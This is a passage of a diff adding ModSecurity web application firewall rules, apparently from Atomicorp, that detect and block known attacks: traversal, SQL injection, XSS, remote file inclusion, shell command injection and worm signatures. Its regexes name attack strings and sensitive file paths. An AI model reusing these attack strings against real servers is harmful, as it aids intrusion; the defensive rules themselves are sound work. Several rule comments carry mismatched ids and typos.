+SecRule ARGS:no_url "(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/"  "phase:2,deny,log,auditlog,status:403,t:none,t:urlDecodeUni,t:lowercase,t:compressWhiteSpace,id:390204,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: no_url ARG URI injection'"
+
+SecMarker END_JITP_INJECTION_RULES
+
+#Java vulnerabilities
+SecRule REQUEST_URI "@pm .sd .do"         "id:333889,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
+SecAction "phase:2,id:309023,t:none,pass,nolog,noauditlog,skipAfter:END_JITP_JAVA"
+
+#Focus on comment argument
+
+
+
+
+
+
+
+# Rule 320013: Java XSS vulnerabilities
+SecRule ARGS:description|ARGS:searchtext "(?:\" ?> ?<|iframe|wf_xsrf\.html|@ ?import)"         "phase:2,deny,log,auditlog,status:403,id:320013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java XSS vulnerability',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+SecMarker END_JITP_JAVA
+
+
+# Rule 310003:   phf access
+SecRule REQUEST_URI "/phf\?"         "phase:2,deny,log,auditlog,status:403,id:310003,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phf access',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310004:   htsearch arbitrary file read attempt
+SecRule REQUEST_URI "/htsearch\?exclude=\`"          "phase:2,deny,log,auditlog,status:403,id:310004,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: tsearch arbitrary file read attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310011: WEB-PHP phplib remote commanSelective REQUEST_URI|REQUEST_BODY
+#	attempt
+SecRule REQUEST_URI|REQUEST_BODY "_phplib\[libdir\]"         "phase:2,deny,log,auditlog,status:403,id:310011,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phplib remote commanSelective REQUEST_URI|REQUEST_BODYd attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310013: Exploit phpBB Highlighting Code Execution Attempt
+SecRule REQUEST_URI|REQUEST_BODY "(?:\;|\&)highlight=\'\.(?:system|mysql_query|fwrite\(fopen)\("         "phase:2,deny,log,auditlog,status:403,id:310013,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: phpBB Highlighting Code Execution Attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310019:  alchemy http server prn arbitrary command execution
+#	attempt
+SecRule REQUEST_URI|REQUEST_BODY "/prn/\.\./\.\./"          "phase:2,deny,log,auditlog,status:403,id:312019,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alchemy http server prn arbitrary command execution attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310021:  alchemy http server NUL arbitrary command execution
+#	attempt
+SecRule REQUEST_URI|REQUEST_BODY "/nul/\.\./\.\./"         "phase:2,deny,log,auditlog,status:403,id:310021,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: alchemy http server NUL arbitrary command execution attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310022:  AltaVista Intranet search directory traversal attempt
+SecRule REQUEST_URI "/query\?mss=\.\."          "phase:2,deny,log,auditlog,status:403,id:310022,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310025:campus attempt
+SecRule REQUEST_URI "/campus\?"         "phase:2,deny,log,auditlog,status:403,id:310025,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: campus attempt',chain,t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:letter "\.\./\.\."
+
+
+# Rule 310041:Demarc SQL injection attempt
+SecRule REQUEST_URI "/dm/demarc"         "phase:2,deny,log,auditlog,status:403,chain,id:310041,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Demarc SQL injection attempt',t:none,t:urlDecodeUni,t:lowercase"
+SecRule ARGS:s_key "'" 
+
+# Rule 310042:  apache directory disclosure attempt
+#SecRule REQUEST_URI "////////"  #        "id:310042,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: apache directory disclosure attempt',t:none,t:urlDecodeUni"
+
+
+# Rule 310043:  htgrep attempt
+SecRule REQUEST_URI "/htgrep"         "id:310043,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: htgrep attempt',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "hdr=/"
+
+
+# Rule 310044:musicat empower attempt
+SecRule REQUEST_URI "/empower\?db="         "id:310044,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: musicat empower attempt',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310052: WEB-PHP strings overflow
+SecRule REQUEST_URI|REQUEST_BODY "\?strengur"          "id:310052,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: strings overflow',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310080:PHPBB worm sigs
+SecRule ARGS:highlight "(?:\x27|%27|\x2527|%2527)"         "chain,id:310080,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPBB worm',t:none,t:lowercase"
+SecRule REQUEST_FILENAME "!(\.htm)"
+
+
+# Rule 310081:Mailto domain search possible MyDoom.M,O
+SecRule REQUEST_URI "/search\?hl=en&ie=utf-8&oe=utf-8&q=mailto\+"         "id:310081,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mailto domain search possible MyDoom.M,O',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "Host\: www\.google\.com"
+
+
+# Rule 310082:WEB-PHP EasyDynamicPages exploit
+SecRule REQUEST_URI "edp_relative_path="         "id:310082,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: EasyDynamicPages exploit',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+
+
+# Rule 310088:  BitKeeper arbitrary command attempt
+SecRule REQUEST_URI "/diffs/"         "id:310088,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: BitKeeper arbitrary command attempt',chain,t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\'"
+
+
+# Rule 310092:mailman 2.x path recursion attack
+# ZZZZZZZZZZZZZZZZZZZZ
+SecRule REQUEST_URI "mailman/private"         "chain,id:310092,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mailman 2.x path recursion attack',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\.\.\./\.\.\.\./"
+
+
+# Rule 310094:Tomcat server snoop access
+SecRule REQUEST_URI "/jsp/snp/"         "chain,id:310094,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Tomcat server snoop access',t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase"
+SecRule REQUEST_URI "\.snp" 
+
+# Rule 310098:  webplus directory traversal
+SecRule REQUEST_URI "/webplus\?script"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:313098,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: webplus directory traversal',chain"
+SecRule REQUEST_URI "\.\./"
+
+
+# Rule 310099:  websendmail access
+SecRule REQUEST_URI "/websendmail"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310099,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: websendmail access'"
+
+SecRule REQUEST_URI "/nph-test-cgi"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310103,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: nph-test-cgi access'"
+
+
+# Rule 310120:  htsearch arbitrary configuration file attempt
+SecRule REQUEST_URI "/htsearch\?\-c"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310120,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  htsearch arbitrary configuration file attempt'"
+
+
+# Rule 310122:  AltaVista Intranet search directory traversal attempt
+SecRule REQUEST_URI "/query\?mss=\.\."         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310122,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AltaVista Intranet search directory traversal attempt'"
+
+
+# Rule 310153: Honeypot signature.
+#SecRule REQUEST_URI|REQUEST_BODY "clamav-partial " #        "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310153,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  clamav-patial recovery file access attempt',chain"
+#SecRule REQUEST_URI|REQUEST_BODY "vi\.recover "
+
+SecRule REQUEST_URI "mode=debug"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310177,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Coldfusion debug mode access attempt'"
+
+
+# Rule 310179:  Unify eWave ServletExec upload
+SecRule REQUEST_URI|REQUEST_BODY "/servlet/com\.unify\.servletexec\.uploadservlet"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310179,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Unify eWave UploadServlet abuse attempt'"
+
+
+# Rule 310203:  mall log order access
+SecRule REQUEST_URI "/mall_log_files/order\.log"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310203,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Mall Log order access attempt'"
+
+
+# Rule 310205:  SWEditServlet directory traversal attempt
+SecRule REQUEST_URI "/sweditservlet"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310205,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  SWEditServlet directory traversal attempt',chain"
+SecRule REQUEST_URI "template=\.\./\.\./\.\./"
+
+
+# Rule 310206:  RBS ISP /newuser directory traversal attempt
+SecRule REQUEST_URI "/newuser\?image=\.\./\.\."         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310206,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  RBS ISP /newuser directory traversal attempt'"
+
+
+# Rule 310209:  Demarc SQL injection attempt
+SecRule REQUEST_URI "/dm/demarc"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310209,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch:  Demarc SQL injection attempt',chain"
+SecRule REQUEST_URI "\'"
+
+#  Rule 310261: WEB-FRONTPAGE .... request
+#SecRule REQUEST_URI|REQUEST_BODY "\.\.\.\./" #        "id:310261,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WEB-FRONTPAGE directory traversal attempt'"
+
+
+# Rule 310285:  Readfile.tcl Access
+SecRule REQUEST_URI "/readfile\.tcl\?file="         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310285,rev:1,severity:1,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: readfile.tcl local file access attempt'"
+
+
+# Rule 310298: mailman XSS
+SecRule REQUEST_URI "/mailman/"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310298,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mailman cross-site-scripting attempt'"
+SecRule ARGS:info "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310304: cross site scripting HTML image tag set to javascript attempt
+#SecRule REQUEST_URI|REQUEST_BODY "img src=javascript" #        "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310304,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Generic Javascript-through-image tag cross-site-scripting attempt'"
+
+
+# Rule 310306: tomcat servlet mapping XSS
+SecRule REQUEST_URI "/servlet/"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310306,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: b2-include local command execution attempt'"
+SecRule REQUEST_URI "/org\.apache\."
+
+#Servlet session disclosure
+SecRule REQUEST_URI "(?:/servlet/sessionservlet|/viewsource\.jsp)"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310836,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Allaire JRun sample scripts access attempt'"
+
+
+# Rule 310334: Interspire ArticleLive 2005 "articleid" Remote Cross-Site
+# 	Scripting Vulnerability
+SecRule REQUEST_URI "/articles/newcomment"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310334,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Interspire ArticleLive newcomment.php cross-site-scripting attempt'"
+SecRule ARGS:articleid ">"
+
+
+# Rule 310374:PunBB version <= 1.2.2 auth bypass exploit
+#SecRule REQUEST_COOKIES:punbb_cookie "a\:2\:\{i\:0\;s\:.*\;i\:1\;b\:1\;\}"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310374,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PunBB cookie manipulation authentication bypass attempt'"
+
+
+
+# Rule 310383:InterAKT Online MX Kart Multiple SQL Injection Vulnerabilities
+SecRule REQUEST_URI "/mxshop/\?mod=category&id_ctg=\'"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310383,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: InterAKT MX Kart mxshop SQL injection attempt'"
+
+
+# Rule 310388: CPG Dragonfly XSS
+SecRule REQUEST_URI "/coppermine/displayimage/"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310388,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: CPG Dragonfly Coppermine cross-site-scripting attempt'"
+SecRule ARGS:cat "(?:(?:javascript|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+#  Rule 310390:AlstraSoft EPay Pro Multiple Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI "/epal/"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310390,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: AlstraSoft EPay Pro epal cross-site-scripting attempt'"
+SecRule ARGS:order_num "(?:(?:script|script|about|applet|activex|chrome)|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" 
+
+
+# Rule 310419:TowerBlog! Discloses Hashed Administrative Password to Remote
+# 	users
+SecRule REQUEST_URI|REQUEST_BODY "/_dat/login"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310419,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TowerBlog! _dat/login password hash disclosure attempt'"
+
+
+# Rule 310019: Oracle 9iAS mod_plsql directory traversal
+# CVE: "CAN-2001-1217"
+SecRule REQUEST_URI  "/pls/sample/admin_/help/\.\."         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310487,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle 9iAS mod_plsql directory traversal'"
+
+
+# Rule 310019: Oracle 9iAS iSQLplus XSS
+SecRule REQUEST_URI "/isqlplus\?action=logon"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310489,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Oracle 9iAS iSQLplus XSS'"
+SecRule ARGS:username "(?:(?:javascript|script|about|applet|activex|chrome)|html|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)"
+
+
+# Rule 310019: OpenCA HTML Injection
+# CVE: "CAN-2004-0787"
+SecRule REQUEST_URI "/cgi-bin/pub/pki\?cmd=serverinfo"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:310592,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OpenCA HTML Injection'"
+
+
+# Rule 310019: Apache Jakarta-Tomcat? /admin Context Vulnerability
+SecRule REQUEST_URI "/admin/\?op=\xc0" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390475,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Apache Jakarta-Tomcat /admin Context Vulnerability'"
+
+
+# Rule 310019: generic Common http vulnerability
+SecRule REQUEST_URI|REQUEST_BODY "/\?cwd=/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390474,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Common http vulnerability'"
+
+
+# Rule 310019: Gurgens Guest Book Remote Database Disclosure Vulnerability
+SecRule REQUEST_URI|REQUEST_BODY "/db/genit\.dat" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390473,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Gurgens Guest Book Remote Database Disclosure Vulnerability'"
+
+
+# Rule 310019: sawmill remote file access
+SecRule REQUEST_URI "/cgi-bin/sawmill5" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390472,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: sawmill remote file access'"
+SecRule REQUEST_URI "\x22"
+
+
+# Rule 310019: Javamail info disclosure
+SecRule REQUEST_URI "/download\?/" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390471,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Javamail information disclosure'"
+SecRule REQUEST_URI "/web/web-inf/web\.xml"
+
+
+# Rule 310019: javamail file access
+SecRule REQUEST_URI|REQUEST_BODY "/download\?(?:\.\./|/\.\./|/etc/|/home/|/tmp/|/usr/|/backup/|/dev/|/proc/|/var/(?:cache|spool|mail|adm|log|tmp)/)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390470,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Javamail file access'"
+
+
+# Rule 310019:  Invision Community Blog Module SQL injection
+SecRule REQUEST_URI "/index.php" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390469,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Invision Community Blog Module SQL injection'"
+SecRule ARGS:mid "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| ]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310019: JBOSS Installation Path and Configuration File disclosure
+#SecRule REQUEST_URI|ARGS|!ARGS:/text/|!ARGS:/^entry/|!ARGS:/message/|!ARGS:/msg/|!ARGS:/body/ "(?:^\%\.|^\%server\.policy)" #"chain,id:390468,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: JBOSS Installation Path and Configuration File disclosure'"
+#SecRule REQUEST_URI "!(^/wp-admin/)"
+
+
+# Rule 310019: Claroline E-Learning SQL injection
+SecRule ARGS:uinfo "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+(?:from|into|table|database|index|view)"  "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390466,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Claroline E-Learning SQL injection'"
+
+
+# Rule 310019: Forum Russian Board 4.2 Full command execution vuln
+SecRule ARGS:style_edit_ok "\xC8x\E7x\ECx\E5x\EDx\E8x\F2x\FC" "t:none,t:urlDecodeUni,t:compressWhiteSpace,id:390465,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Forum Russian Board 4.2 Full command execution'"
+
+
+# Rule 310019: cpanel XSS vuln
+SecRule REQUEST_URI|ARGS "/login" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390464,chain,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: cpanel XSS vulnerability'"
+SecRule ARGS:user "<[[:space:]]*(?:script|about|applet|activex|chrome)"
+
+
+# Rule 310019: PHP-Fusion database backup file retrieval vuln
+SecRule REQUEST_URI|ARGS "/(?:fusion_admin|administration)/db_backups/" "t:none,t:urlDecodeUni,t:lowercase,id:390463,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP-Fusion database backup file retrieval'"
+
+
+# Rule 310019: Wordpress cat vuln
+SecRule REQUEST_URI  "/wordpress/"         "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390601,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress cat vuln'"
+SecRule ARGS:cat "!(^-?[0-9])" "t:none,t:urlDecodeUni,t:compressWhiteSpace"
+
+
+# Rule 310019: honetpot catch
+#SecRule REQUEST_URI "\x03\x03\x03\x03\x18\x18\x18\x18\x1a\x1c\x1a\x1c\x1c4r43tr" #"t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390462,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known wormsign'"
+
+
+# Rule 310019: PHP Surveyor Remote SQL Injection
+SecRule REQUEST_URI "/admin/" "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,chain,id:390461,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPlist SQL injection'"
+SecRule ARGS:sid|ARGS:start|ARGS:id|ARGS:lid "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310019: netquery 3.1 Remote Command Execution vuln
+SecRule ARGS:op "^modload$" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:310594,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: netquery 3.1 Remote Command Execution vuln'"
+SecRule ARGS:name "^net$" chain
+SecRule ARGS:query "^ping$" chain
+SecRule ARGS:host "\|"
+
+
+# Rule 310019: PHPlist SQL injection
+SecRule REQUEST_URI "lists/admin/\?page=admin" "chain,t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390460,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHPlist SQL injection'"
+SecRule ARGS:id "(?:select|grant|delete|insert|drop|do|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |,]+[[:space:]](?:from|into|table|database|index|view)"
+
+
+# Rule 310019: python namespace exposure with karrigell services
+SecRule REQUEST_FILENAME "\.ks$" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390459,rev:4,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: python namespace exposure with karrigell service'"
+SecRule REQUEST_URI|ARGS "(?:\?\x22|(?:file|input|open|raw_input|reload|(?:(?:s|g)et|del|has)attr|import|callable|compile|execfile|exec|globals))" 
+
+# Rule 310019: Test CGI probe
+SecRule REQUEST_FILENAME "/test-cgi$" "t:none,t:urlDecodeUni,t:lowercase,id:390458,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Test CGI probe'"
+
+
+# Rule 310019: Annoying Cisco IOS http configuration probe attempts
+SecRule REQUEST_URI "/level/[0-9]+/exec/-/+pwd" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390457,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Cisco IOS http configuration probe attempts'"
+
+#SecRule REQUEST_URI|REQUEST_BODY "content-length:.*user=.*pass=.*pass2=.*oldpass=.*loc.*(?:\x22|system)" #"id:390456,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Authentication bypass attack'"
+
+
+# Rule 310019: man2web cgi-scripts remote command spawn
+SecRule REQUEST_URI "/(?:man-cgi|man2web|man2html)" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390455,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: man2web cgi-scripts remote command spawn'"
+SecRule REQUEST_URI "(?:\x20|\|)"
+
+
+# Rule 310019: SimplePHPBplog vulns
+#SecRule REQUEST_URI|ARGS "<pre ?>.*command\: [a-z|0-9|\w].*pre ?> ?< ?hr" #"id:390454,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: SimplePHPBplog Injection Attack'"
+
+
+# Rule 310019: mimicboard2 Exposure of user Credentials
+SecRule REQUEST_URI "/mimic2\.dat" "t:none,t:urlDecodeUni,t:lowercase,id:390453,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: mimicboard2 Exposure of user Credentials'"
+
+
+# Rule 310019: Mall23 eCommerce "idPage" SQL Injection Vulnerability
+SecRule ARGS:idPage "(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe)[[:space:]]+[a-z|0-9|\*| |\,]+[[:space:]]+(?:from|into|table|database|index|view)[[:space:]]+[a-z|0-9|\*| |\,]"  "t:none,t:urlDecodeUni,t:replaceNulls,t:replaceComments,t:compressWhiteSpace,t:lowercase,id:390452,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Mall23 eCommerce idPage SQL Injection Vulnerability'"
+
+
+# Rule 310019: TWiki "rev" Shell Command Injection Vulnerability
+SecRule REQUEST_URI "/twikiusers" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390451,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability'"
+SecRule ARGS:rev "![0-9]+"
+
+
+# Rule 310019: TWiki "rev" Shell Command Injection Vulnerability
+SecRule REQUEST_URI "/twikiusers" "t:none,t:urlDecodeUni,t:lowercase,chain,id:390450,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki rev Shell Command Injection Vulnerability'"
+SecRule ARGS:rev "(?:\'|\|)" 
+
+# Rule 310019: http header PHP code injection attacks
+SecRule REQUEST_HEADERS:Client-Ip|REQUEST_HEADERS:user-agent|REQUEST_HEADERS:Referer "(?:<\?php|<[[:space:]]?\?[[:space:]]?php|<\? php)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390449,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: http header PHP code injection attack'"
+SecRule REQUEST_URI "!(/administrator/index\.php)"
+
+
+# Rule 310019: TWiki "%include" Shell Command Injection Vulnerability
+#SecRule REQUEST_URI|ARGS|!ARGS:/^wpText/|!ARGS:description "include.*rev=.*\|.*\}" #"id:393449,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: TWiki Shell Command Injection Vulnerability'"
+
+
+# Rule 310019: MediaWiki Cross-Site Scripting Vulnerabilities
+SecRule REQUEST_URI|ARGS "\<(?:math|nowiki)" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,chain,id:390448,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: MediaWiki Cross-Site Scripting Vulnerabilities'"
+SecRule REQUEST_URI|ARGS "<[[:space:]]*(?:script|about|applet|activex|chrome)" 
+
+# Rule 310019: phorum spam rules
+SecRule ARGS:PHORUM_config "(?:@|^(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/)" "t:none,t:urlDecodeUni,t:lowercase,id:390447,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Phorum Injection Attack'"
+
+
+# Rule 310019: wormsign
+SecRule REQUEST_URI|REQUEST_BODY "thmc\.\$dbhost\.thmc\.\$dbname\.thmc\.\$dbuser\.thmc\.\$dbpasswd\.thmc" "t:none,t:urlDecodeUni,t:compressWhiteSpace,t:lowercase,id:390446,rev:1,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Known Wormsign'"
+
+
+# Rule 310019: phpbb wormsign
